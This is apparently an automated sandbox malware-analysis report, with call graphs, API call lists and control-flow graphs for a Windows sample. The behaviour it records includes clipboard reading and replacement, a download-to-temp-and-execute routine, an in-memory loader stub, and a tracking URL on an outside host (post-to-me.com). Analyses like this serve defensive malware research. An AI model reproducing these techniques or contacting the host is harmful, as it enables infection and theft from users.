calls __dosmaperr 65749->65766 65750 4346de 65767 434718 LeaveCriticalSection __wsopen_s 65750->65767 65753->65743 65771 439911 65754->65771 65756 434757 65757 434770 SetFilePointerEx 65756->65757 65758 43475f 65756->65758 65760 434764 65757->65760 65761 434788 GetLastError 65757->65761 65784 42eab9 20 API calls __dosmaperr 65758->65784 65760->65750 65785 42ea83 20 API calls __dosmaperr 65761->65785 65763->65734 65764->65741 65765->65749 65766->65750 65767->65741 65768->65737 65769->65742 65770->65741 65772 439933 65771->65772 65773 43991e 65771->65773 65778 439958 65772->65778 65788 42eaa6 20 API calls __dosmaperr 65772->65788 65786 42eaa6 20 API calls __dosmaperr 65773->65786 65775 439923 65787 42eab9 20 API calls __dosmaperr 65775->65787 65778->65756 65779 439963 65789 42eab9 20 API calls __dosmaperr 65779->65789 65780 43992b 65780->65756 65782 43996b 65790 42a58d 26 API calls _Deallocate 65782->65790 65784->65760 65785->65760 65786->65775 65787->65780 65788->65779 65789->65782 65790->65780 65791 402bfa InternetOpenW 65792 402e4b 65791->65792 65795 402c2d ListArray 65791->65795 65793 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65792->65793 65794 402e5a 65793->65794 65803 42deed 65795->65803 65798 42deed std::_Locinfo::_Locinfo_dtor 26 API calls 65799 402e0d 65798->65799 65800 42deed std::_Locinfo::_Locinfo_dtor 26 API calls 65799->65800 65801 402e1f InternetOpenUrlW 65800->65801 65801->65792 65802 402e3a InternetCloseHandle InternetCloseHandle 65801->65802 65802->65792 65804 42df0a 65803->65804 65807 42defc 65803->65807 65812 42eab9 20 API calls __dosmaperr 65804->65812 65806 42df14 65813 42a58d 26 API calls _Deallocate 65806->65813 65807->65804 65810 42df3a 65807->65810 65809 402dff 65809->65798 65810->65809 65814 42eab9 20 API calls __dosmaperr 65810->65814 65812->65806 65813->65809 65814->65806 65815 40fbfc 65816 40fc08 __FrameHandler3::FrameUnwindToState 65815->65816 65844 40ffe9 65816->65844 65818 40fc0f 65819 40fd62 65818->65819 65822 40fc39 65818->65822 65865 4104c3 4 API calls 2 library calls 65819->65865 65821 40fd69 65866 42ffb9 28 API calls _Atexit 65821->65866 65832 40fc78 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65822->65832 65859 42fcde 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65822->65859 65824 40fd6f 65867 42ff6b 28 API calls _Atexit 65824->65867 65827 40fd77 65828 40fc52 65829 40fc58 65828->65829 65860 42fc82 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65828->65860 65831 40fcd9 65855 4105dd 65831->65855 65832->65831 65861 42a356 167 API calls 4 library calls 65832->65861 65835 40fcdf 65836 40fcf4 65835->65836 65862 410613 GetModuleHandleW 65836->65862 65838 40fcfb 65838->65821 65839 40fcff 65838->65839 65840 40fd08 65839->65840 65863 42ff5c 28 API calls _Atexit 65839->65863 65864 410178 13 API calls 2 library calls 65840->65864 65843 40fd10 65843->65829 65845 40fff2 65844->65845 65868 41076b IsProcessorFeaturePresent 65845->65868 65847 40fffe 65869 428817 10 API calls 3 library calls 65847->65869 65849 410003 65850 410007 65849->65850 65870 431791 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65849->65870 65850->65818 65852 410010 65853 41001e 65852->65853 65871 428840 8 API calls 3 library calls 65852->65871 65853->65818 65872 426820 65855->65872 65858 410603 65858->65835 65859->65828 65860->65832 65861->65831 65862->65838 65863->65840 65864->65843 65865->65821 65866->65824 65867->65827 65868->65847 65869->65849 65870->65852 65871->65850 65873 4105f0 GetStartupInfoW 65872->65873 65873->65858 65874 4332ce 65875 4332f3 65874->65875 65876 4332db 65874->65876 65880 43334e 65875->65880 65888 4332eb 65875->65888 65926 434cbd 21 API calls 2 library calls 65875->65926 65924 42eab9 20 API calls __dosmaperr 65876->65924 65878 4332e0 65925 42a58d 26 API calls _Deallocate 65878->65925 65882 4328f8 __fread_nolock 26 API calls 65880->65882 65883 433366 65882->65883 65894 432e06 65883->65894 65885 43336d 65886 4328f8 __fread_nolock 26 API calls 65885->65886 65885->65888 65887 433399 65886->65887 65887->65888 65889 4328f8 __fread_nolock 26 API calls 65887->65889 65890 4333a7 65889->65890 65890->65888 65891 4328f8 __fread_nolock 26 API calls 65890->65891 65892 4333b7 65891->65892 65893 4328f8 __fread_nolock 26 API calls 65892->65893 65893->65888 65895 432e12 __FrameHandler3::FrameUnwindToState 65894->65895 65896 432e32 65895->65896 65897 432e1a 65895->65897 65899 432ef8 65896->65899 65904 432e6b 65896->65904 65993 42eaa6 20 API calls __dosmaperr 65897->65993 66000 42eaa6 20 API calls __dosmaperr 65899->66000 65901 432e1f 65994 42eab9 20 API calls __dosmaperr 65901->65994 65902 432efd 66001 42eab9 20 API calls __dosmaperr 65902->66001 65905 432e7a 65904->65905 65906 432e8f 65904->65906 65995 42eaa6 20 API calls __dosmaperr 65905->65995 65927 439694 EnterCriticalSection 65906->65927 65910 432e87 66002 42a58d 26 API calls _Deallocate 65910->66002 65911 432e7f 65996 42eab9 20 API calls __dosmaperr 65911->65996 65912 432e95 65914 432eb1 65912->65914 65915 432ec6 65912->65915 65997 42eab9 20 API calls __dosmaperr 65914->65997 65928 432f19 65915->65928 65917 432e27 __fread_nolock 65917->65885 65920 432eb6 65998 42eaa6 20 API calls __dosmaperr 65920->65998 65921 432ec1 65999 432ef0 LeaveCriticalSection __wsopen_s 65921->65999 65924->65878 65925->65888 65926->65880 65927->65912 65929 432f43 65928->65929 65930 432f2b 65928->65930 65932 4332ad 65929->65932 65937 432f88 65929->65937 66012 42eaa6 20 API calls __dosmaperr 65930->66012 66030 42eaa6 20 API calls __dosmaperr 65932->66030 65933 432f30 66013 42eab9 20 API calls __dosmaperr 65933->66013 65936 4332b2 66031 42eab9 20 API calls __dosmaperr 65936->66031 65939 432f93 65937->65939 65942 432f38 65937->65942 65944 432fc3 65937->65944 66014 42eaa6 20 API calls __dosmaperr 65939->66014 65940 432fa0 66032 42a58d 26 API calls _Deallocate 65940->66032 65942->65921 65943 432f98 66015 42eab9 20 API calls __dosmaperr 65943->66015 65947 432fdc 65944->65947 65948 433002 65944->65948 65949 43301e 65944->65949 65947->65948 65956 432fe9 65947->65956 66016 42eaa6 20 API calls __dosmaperr 65948->66016 66019 433697 21 API calls 3 library calls 65949->66019 65951 433007 66017 42eab9 20 API calls __dosmaperr 65951->66017 65953 433035 65957 43345a _free 20 API calls 65953->65957 66003 43d355 65956->66003 65960 43303e 65957->65960 65958 43300e 66018 42a58d 26 API calls _Deallocate 65958->66018 65959 433187 65962 4331fd 65959->65962 65965 4331a0 GetConsoleMode 65959->65965 65963 43345a _free 20 API calls 65960->65963 65964 433201 ReadFile 65962->65964 65966 433045 65963->65966 65967 433275 GetLastError 65964->65967 65968 43321b 65964->65968 65965->65962 65969 4331b1 65965->65969 65970 43306a 65966->65970 65971 43304f 65966->65971 65972 433282 65967->65972 65973 4331d9 65967->65973 65968->65967 65974 4331f2 65968->65974 65969->65964 65975 4331b7 ReadConsoleW 65969->65975 66022 4347de 65970->66022 66020 42eab9 20 API calls __dosmaperr 65971->66020 66028 42eab9 20 API calls __dosmaperr 65972->66028 65981 433019 __fread_nolock 65973->65981 66025 42ea83 20 API calls __dosmaperr 65973->66025 65974->65981 65987 433240 65974->65987 65988 433257 65974->65988 65975->65974 65980 4331d3 GetLastError 65975->65980 65976 43345a _free 20 API calls 65976->65942 65980->65973 65981->65976 65983 433054 66021 42eaa6 20 API calls __dosmaperr 65983->66021 65984 433287 66029 42eaa6 20 API calls __dosmaperr 65984->66029 66026 432c35 31 API calls 2 library calls 65987->66026 65988->65981 65989 43326e 65988->65989 66027 432a75 29 API calls __fread_nolock 65989->66027 65992 433273 65992->65981 65993->65901 65994->65917 65995->65911 65996->65910 65997->65920 65998->65921 65999->65917 66000->65902 66001->65910 66002->65917 66004 43d362 66003->66004 66005 43d36f 66003->66005 66033 42eab9 20 API calls __dosmaperr 66004->66033 66007 43d37b 66005->66007 66034 42eab9 20 API calls __dosmaperr 66005->66034 66007->65959 66009 43d367 66009->65959 66010 43d39c 66035 42a58d 26 API calls _Deallocate 66010->66035 66012->65933 66013->65942 66014->65943 66015->65940 66016->65951 66017->65958 66018->65981 66019->65953 66020->65983 66021->65981 66023 434745 __fread_nolock 28 API calls 66022->66023 66024 4347f4 66023->66024 66024->65956 66025->65981 66026->65981 66027->65992 66028->65984 66029->65981 66030->65936 66031->65940 66032->65942 66033->66009 66034->66010 66035->66009 66036 783626 66037 783635 66036->66037 66040 783dc6 66037->66040 66041 783de1 66040->66041 66042 783dea CreateToolhelp32Snapshot 66041->66042 66043 783e06 Module32First 66041->66043 66042->66041 66042->66043 66044 78363e 66043->66044 66045 783e15 66043->66045 66047 783a85 66045->66047 66048 783ab0 66047->66048 66049 783af9 66048->66049 66050 783ac1 VirtualAlloc 66048->66050 66049->66049 66050->66049

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                                                                                                                                                • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                                                                                                                                                  • Part of subcall function 0040CC06: _strlen.LIBCMT ref: 0040CC1D
                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 00401749
                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 00401778
                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 004018BC
                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004018D2
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040193D
                                                                                                                                                                                                                                • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                • String ID: i
                                                                                                                                                                                                                                • API String ID: 1583243082-3865851505
                                                                                                                                                                                                                                • Opcode ID: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                                                                                                                                                                                • Instruction ID: 84ae510e80891b91da9cfa011cccf91080e50da4f88b7c16b45420ac6e32ace8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB51F331C00384DAE711ABA4EC467AD7774FF29306F04523AE805B22B3EB789A85C75D

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A0D
                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 00402A23
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000105,?), ref: 00402A3F
                                                                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A55
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A8E
                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402ACA
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AE7
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402AFD
                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00402B5E
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B73
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00402B7F
                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402B88
                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402B8B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                • String ID: .exe$<$ShareScreen
                                                                                                                                                                                                                                • API String ID: 3323492106-493228180
                                                                                                                                                                                                                                • Opcode ID: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                                                                                                                                                                                • Instruction ID: 1f3e70d10a2fb6dcbdd3680cf8e7ca54fef569da526477a1452c3d554320dc38
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C41847190021CAFEB209F549D85FEA77BCFF04745F0080F6A548E2190DE749E858FA4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00783DEE
                                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 00783E0E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3954477135.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_783000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3833638111-0
                                                                                                                                                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                • Instruction ID: f873d9cb7bde8703c3a6d97cb5eb78e452a06e9839b93e302b08ae60d60eb1e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4F06231240711ABD7207AB9988DB6E7AE8FF49B25F100668E642950C0DB78E9454761

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 74 43d02c-43d05c call 43cd8f 77 43d077-43d083 call 43976e 74->77 78 43d05e-43d069 call 42eaa6 74->78 83 43d085-43d09a call 42eaa6 call 42eab9 77->83 84 43d09c-43d0e5 call 43ccfa 77->84 85 43d06b-43d072 call 42eab9 78->85 83->85 94 43d152-43d15b GetFileType 84->94 95 43d0e7-43d0f0 84->95 92 43d34e-43d354 85->92 96 43d1a4-43d1a7 94->96 97 43d15d-43d18e GetLastError call 42ea83 CloseHandle 94->97 99 43d0f2-43d0f6 95->99 100 43d127-43d14d GetLastError call 42ea83 95->100 103 43d1b0-43d1b6 96->103 104 43d1a9-43d1ae 96->104 97->85 113 43d194-43d19f call 42eab9 97->113 99->100 105 43d0f8-43d125 call 43ccfa 99->105 100->85 108 43d1ba-43d208 call 4396b7 103->108 109 43d1b8 103->109 104->108 105->94 105->100 116 43d20a-43d216 call 43cf0b 108->116 117 43d218-43d23c call 43caad 108->117 109->108 113->85 116->117 123 43d240-43d24a call 4335bd 116->123 124 43d24f-43d292 117->124 125 43d23e 117->125 123->92 127 43d2b3-43d2c1 124->127 128 43d294-43d298 124->128 125->123 129 43d2c7-43d2cb 127->129 130 43d34c 127->130 128->127 132 43d29a-43d2ae 128->132 129->130 133 43d2cd-43d300 CloseHandle call 43ccfa 129->133 130->92 132->127 136 43d302-43d32e GetLastError call 42ea83 call 439880 133->136 137 43d334-43d348 133->137 136->137 137->130
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0043CCFA: CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0043D140
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043D147
                                                                                                                                                                                                                                • GetFileType.KERNEL32(00000000), ref: 0043D153
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0043D15D
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043D166
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0043D186
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0043D2D0
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0043D302
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043D309
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                • Instruction ID: 76b590644e61a1e30ee63bf02a6fb5b1311e46919e71f325493a9cd527e13796
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09A14732E101049FDF19AF68EC917AE7BB1AF0A324F14115EE815AB3D1D7389D12CB5A

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 142 432f19-432f29 143 432f43-432f45 142->143 144 432f2b-432f3e call 42eaa6 call 42eab9 142->144 146 432f4b-432f51 143->146 147 4332ad-4332ba call 42eaa6 call 42eab9 143->147 158 4332c5 144->158 146->147 150 432f57-432f82 146->150 164 4332c0 call 42a58d 147->164 150->147 153 432f88-432f91 150->153 156 432f93-432fa6 call 42eaa6 call 42eab9 153->156 157 432fab-432fad 153->157 156->164 161 432fb3-432fb7 157->161 162 4332a9-4332ab 157->162 163 4332c8-4332cd 158->163 161->162 166 432fbd-432fc1 161->166 162->163 164->158 166->156 167 432fc3-432fda 166->167 170 432ff7-433000 167->170 171 432fdc-432fdf 167->171 175 433002-433019 call 42eaa6 call 42eab9 call 42a58d 170->175 176 43301e-433028 170->176 173 432fe1-432fe7 171->173 174 432fe9-432ff2 171->174 173->174 173->175 177 433093-4330ad 174->177 207 4331e0 175->207 179 43302a-43302c 176->179 180 43302f-43304d call 433697 call 43345a * 2 176->180 182 4330b3-4330c3 177->182 183 433181-43318a call 43d355 177->183 179->180 211 43306a-433090 call 4347de 180->211 212 43304f-433065 call 42eab9 call 42eaa6 180->212 182->183 188 4330c9-4330cb 182->188 196 4331fd 183->196 197 43318c-43319e 183->197 188->183 189 4330d1-4330f7 188->189 189->183 193 4330fd-433110 189->193 193->183 198 433112-433114 193->198 200 433201-433219 ReadFile 196->200 197->196 202 4331a0-4331af GetConsoleMode 197->202 198->183 203 433116-433141 198->203 205 433275-433280 GetLastError 200->205 206 43321b-433221 200->206 202->196 208 4331b1-4331b5 202->208 203->183 210 433143-433156 203->210 213 433282-433294 call 42eab9 call 42eaa6 205->213 214 433299-43329c 205->214 206->205 215 433223 206->215 209 4331e3-4331ed call 43345a 207->209 208->200 216 4331b7-4331d1 ReadConsoleW 208->216 209->163 210->183 218 433158-43315a 210->218 211->177 212->207 213->207 225 4332a2-4332a4 214->225 226 4331d9-4331df call 42ea83 214->226 222 433226-433238 215->222 223 4331d3 GetLastError 216->223 224 4331f2-4331fb 216->224 218->183 229 43315c-43317c 218->229 222->209 233 43323a-43323e 222->233 223->226 224->222 225->209 226->207 229->183 237 433240-433250 call 432c35 233->237 238 433257-433262 233->238 247 433253-433255 237->247 239 433264 call 432d85 238->239 240 43326e-433273 call 432a75 238->240 248 433269-43326c 239->248 240->248 247->209 248->247
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                • Instruction ID: 8b8381e38334751f3c5fee40e88eacdf1446f1079df49a385922c4ea532b4e29
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CC10670E04345AFDF11DFA9D841BAEBBB0BF0D305F14519AE805A7392C7789A41CB69

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 250 214003c-2140047 251 214004c-2140263 call 2140a3f call 2140e0f call 2140d90 VirtualAlloc 250->251 252 2140049 250->252 267 2140265-2140289 call 2140a69 251->267 268 214028b-2140292 251->268 252->251 273 21402ce-21403c2 VirtualProtect call 2140cce call 2140ce7 267->273 270 21402a1-21402b0 268->270 272 21402b2-21402cc 270->272 270->273 272->270 279 21403d1-21403e0 273->279 280 21403e2-2140437 call 2140ce7 279->280 281 2140439-21404b8 VirtualFree 279->281 280->279 282 21405f4-21405fe 281->282 283 21404be-21404cd 281->283 287 2140604-214060d 282->287 288 214077f-2140789 282->288 286 21404d3-21404dd 283->286 286->282 292 21404e3-2140505 LoadLibraryA 286->292 287->288 293 2140613-2140637 287->293 290 21407a6-21407b0 288->290 291 214078b-21407a3 288->291 294 21407b6-21407cb 290->294 295 214086e-21408be LoadLibraryA 290->295 291->290 296 2140517-2140520 292->296 297 2140507-2140515 292->297 298 214063e-2140648 293->298 299 21407d2-21407d5 294->299 302 21408c7-21408f9 295->302 300 2140526-2140547 296->300 297->300 298->288 301 214064e-214065a 298->301 303 2140824-2140833 299->303 304 21407d7-21407e0 299->304 305 214054d-2140550 300->305 301->288 306 2140660-214066a 301->306 307 2140902-214091d 302->307 308 21408fb-2140901 302->308 314 2140839-214083c 303->314 309 21407e4-2140822 304->309 310 21407e2 304->310 311 2140556-214056b 305->311 312 21405e0-21405ef 305->312 313 214067a-2140689 306->313 308->307 309->299 310->303 315 214056d 311->315 316 214056f-214057a 311->316 312->286 317 2140750-214077a 313->317 318 214068f-21406b2 313->318 314->295 319 214083e-2140847 314->319 315->312 321 214057c-2140599 316->321 322 214059b-21405bb 316->322 317->298 323 21406b4-21406ed 318->323 324 21406ef-21406fc 318->324 325 2140849 319->325 326 214084b-214086c 319->326 333 21405bd-21405db 321->333 322->333 323->324 327 21406fe-2140748 324->327 328 214074b 324->328 325->295 326->314 327->328 328->313 333->305
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0214024D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                • Instruction ID: 48cea063c97ef949dd5434e3ad27270cf03c1d81571c479ac5389c31e4d80e02
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52527974A01229DFDB64CF59C984BACBBB1BF09304F1580E9E94DAB351DB30AA85DF14

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C1D
                                                                                                                                                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E30
                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402E41
                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402E44
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                                                                                                                                                • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                • API String ID: 3067768807-1501832161
                                                                                                                                                                                                                                • Opcode ID: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                                                                                                                                                                                • Instruction ID: 38c4ea95430cb0d064a2c81279cd8101482ed185274a1110c797b87c00f11b19
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C517095A65344A9E320EBB0BC46B3633B8FF58712F10543BE518CB2F2E7B49944875E

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1687354797-0
                                                                                                                                                                                                                                • Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                                • Instruction ID: ef80ad8abc8d01ee6ed88eea47d540721f1d2954bb97cc6dce8e21ba99fc2e21
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB215172C042489ADF15EBF5D8417DEB7F8AF08318F54407FE400B62C1DB7D89448A69

